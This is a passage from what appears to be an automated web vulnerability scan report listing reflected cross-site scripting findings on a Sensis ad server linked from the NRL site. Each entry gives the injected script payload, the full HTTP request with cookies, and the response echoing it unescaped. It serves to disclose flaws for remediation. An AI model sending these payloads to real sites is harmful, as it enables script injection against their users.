Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:06 GMT
X-DirectServer: DS6
Content-Type: text/html
Content-Length: 322
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?b1dfb"><script>alert(1)</script>d811a4a1280=1" target="_new">
...[SNIP]...

1.50. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0d4e"><script>alert(1)</script>62fcb4681d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverc0d4e"><script>alert(1)</script>62fcb4681d6/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:12 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 359
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f64538cd0d3800000000c0d4e"><script>alert(1)</script>62fcb4681d6/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.51. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfc0"><script>alert(1)</script>2bd1dcbe073 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random7bfc0"><script>alert(1)</script>2bd1dcbe073=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f31e38cd0d3800000000/acc_random7bfc0"><script>alert(1)</script>2bd1dcbe073=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.52. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cec"><script>alert(1)</script>e5f60b4722f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?68cec"><script>alert(1)</script>e5f60b4722f=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:06 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 367
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40438cd0d3800000000/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?68cec"><script>alert(1)</script>e5f60b4722f=1" target="_new">
...[SNIP]...

1.53. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 342f2"-alert(1)-"eb87461d58a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver342f2"-alert(1)-"eb87461d58a/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:50 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2054
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000342f2"-alert(1)-"eb87461d58a/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "h
...[SNIP]...

1.54. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b34ee"-alert(1)-"491d3a72638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_randomb34ee"-alert(1)-"491d3a72638=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:54 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 2042
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_randomb34ee"-alert(1)-"491d3a72638=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media
...[SNIP]...

1.55. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd63"-alert(1)-"cd13d271e02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?3bd63"-alert(1)-"cd13d271e02=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:44 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2060
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
lia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?3bd63"-alert(1)-"cd13d271e02=1&relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=84996739971
...[SNIP]...

1.56. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 712bb"-alert(1)-"696f09d19b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver712bb"-alert(1)-"696f09d19b0/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 2051
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000712bb"-alert(1)-"696f09d19b0/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "ht
...[SNIP]...

1.57. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc670"-alert(1)-"bd04e5a903d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_randomfc670"-alert(1)-"bd04e5a903d=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:18 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 2040
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_randomfc670"-alert(1)-"bd04e5a903d=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.
...[SNIP]...

1.58. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75deb"-alert(1)-"ceb8cc61332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?75deb"-alert(1)-"ceb8cc61332=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:08 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 2057
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
alia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?75deb"-alert(1)-"ceb8cc61332=1&relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=86235691049
...[SNIP]...

1.59. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5876"><script>alert(1)</script>87f35693f1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservere5876"><script>alert(1)</script>87f35693f1d/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:43 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 365
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003ea3f38cd0d3800000000e5876"><script>alert(1)</script>87f35693f1d/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.60. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f259"><script>alert(1)</script>4e431d63655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random8f259"><script>alert(1)</script>4e431d63655=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:46 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 362
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

